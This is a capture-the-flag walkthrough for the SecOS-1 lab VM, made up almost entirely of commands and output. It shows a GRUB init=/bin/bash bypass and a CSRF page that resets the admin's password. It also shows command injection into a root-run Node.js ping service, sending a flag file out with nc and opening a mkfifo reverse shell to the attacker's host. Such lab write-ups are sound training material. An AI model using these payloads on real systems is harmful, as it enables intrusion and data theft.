# SecOS 1


ht# wget http://download.vulnhub.com/secos/SecOS-1.tar.gz
ht# md5sum SecOS-1.tar.gz 
e8c01ab49b98926a37f79e2ea414cfc5  SecOS-1.tar.gz
ht# tar xvzf SecOS-1.tar.gz
ht# virtualbox
<Run SecOS-1>

Grub solution

GNU GRUB
*Ubuntu
e
linux /vmlinuz-3.13.0-24-generic root=/dev/mapper/SecOS--1--vg-rot ro init=/bin/bash
F10
root@(none):/# cat /root/flag.txt | grep -m 1 flag
The flag for this first (VM) is: MickeyMustNotDie.
root@(none):/# mount -o remout,rw /
root@(none):/# passwd root
<Reboot>

CSRF solution

ht# nmap 192.168.1.1
PORT     STATE SERVICE
22/tcp   open  ssh
8081/tcp open  blackice-icecap
ht# curl --silent http://192.168.1.1:8081
---
            <!--<li><a href="/hint">Wanna help?</a></li>!-->
            <li><a href="/sign-up">Sign up</a></li>
            <li><a href="/login">Login</a></li>
---
ht# curl --silent http://192.168.1.1:8081/hint
---
        <!--
        First: the admin visits the website (really) frequently
        Second: He runs it locally, on 127.0.0.1. 
        Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough
        !-->
---
ht# curl --silent --request POST --data 'username=user&password=pass' http://192.168.1.1:8081/sign-up
ht# curl --silent --request POST --cookie-jar uc --cookie uc --data 'username=user&password=pass' http://192.168.1.1:8081/login
ht# curl --silent --cookie-jar uc --cookie uc http://192.168.1.1:8081/users
ht# curl --silent --request POST --cookie-jar uc --cookie uc --data 'to=spiderman&message=http://192.168.1.2:8000/csrf.html' http://192.168.1.1:8081/send-message
ht# cat csrf.html 
<html>
<body>
<form action='http://127.0.0.1:8081/change-password' method='post' name='form'>
<input name='password' value='pass'>
</form>
<script type='text/javascript'>document.form.submit();</script>
</body>
</html>
ht# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.1 - - "GET /csrf.html HTTP/1.1" 200 -
ht# curl --silent --request POST --cookie-jar sc --cookie sc --data 'username=spiderman&password=pass' http://192.168.1.1:8081/login
ht# curl --silent --cookie-jar sc --cookie sc http://192.168.1.1:8081/messages | grep Well
                    <td>Well, your password is.. "CrazyPassword!". So, what do you say? </td>
ht# ssh spiderman@192.168.1.1
spiderman@192.168.1.1's password:CrazyPassword!
spiderman@SecOS-1:~$ crontab -e
* * * * * /opt/phantomjs/bin/phantomjs /home/spiderman/vnwa/scripts/admin.js
spiderman@SecOS-1:~$ ps axuf | grep sudo
sudo -u spiderman sh -c /usr/local/bin/node /home/spiderman/vnwa/server.js
sudo -u root sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
spiderman@SecOS-1:~$ cat /home/spiderman/vnwa/internalServer.js
var fs = require('fs');
var express = require('express');
var http = require('http');
var sys = require('sys')
var exec = require('child_process').exec;
var crypto = require('crypto');

var utils = require('./lib/utils.js');
var model = require('./lib/model.js');

var app = express();
var server = http.createServer(app); 

var logger = function (req, res, next) {
    console.log(req.connection.remoteAddress + " tried to access : " + req.url);
    next(); // Passing the request to the next handler in the stack.
}

// Configuration
app.configure(function () {
    // Session management
    app.use(express.cookieParser());
    app.use(express.session({secret: 'privateKeyForSession'}));
    app.use("/js", express.static(__dirname + '/public/js')); // javascript folder
    app.use("/css", express.static(__dirname + '/public/css')); // javascript folder

    app.set('views', __dirname + '/views'); // views folder
    app.set('view engine', 'ejs'); // view engine for this projet : ejs 

    app.use(express.bodyParser()); // for POST Requests
    app.use(logger); // Here you add your logger to the stack.
    app.use(app.router); // The Express routes handler.
});


app.get('/', function (req, res) {
    res.render('ping.ejs', {
        isConnected: req.session.isConnected,
        isAdmin: req.session.isAdmin
    });
});

// Update password
app.post('/', function (req, res) {
    ip = req.body.ip
    if (ip == "") {
        utils.redirect(req, res, '/ping-status');
    } else {
        // getting the command with req.params.command
        var child;
        // console.log(req.params.command);
        child = exec('ping ' + ip, function (error, stdout, stderr) {
            res.render('ping.ejs', {
                isConnected: req.session.isConnected,
                message: stdout,
                isAdmin: req.session.isAdmin
            });
        });
    }
});

server.listen(9000, '127.0.0.1', function() {
  console.log("Listening on port 9000");
});
spiderman@SecOS-1:~$ curl --silent --request POST --data 'ip=-c 1 127.0.0.1; nc 192.168.1.2 1234 < /root/flag.txt' http://127.0.0.1:9000
ht# ncat -l 192.168.1.2 1234 | grep -m 1 flag
The flag for this first (VM) is: MickeyMustNotDie.
spiderman@SecOS-1:~$ function encode { echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'; }
spiderman@SecOS-1:~$ encoded=`encode '-c 1 127.0.0.1; if [ ! -p /tmp/f ]; then mkfifo /tmp/f; fi ; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.2 1234 > /tmp/f'`
spiderman@SecOS-1:~$ curl --silent --request POST --data "ip=$encoded" http://127.0.0.1:9000
ht# ncat -l 192.168.1.2 1234
# hostname
SecOS-1
# whoami
root

No comments: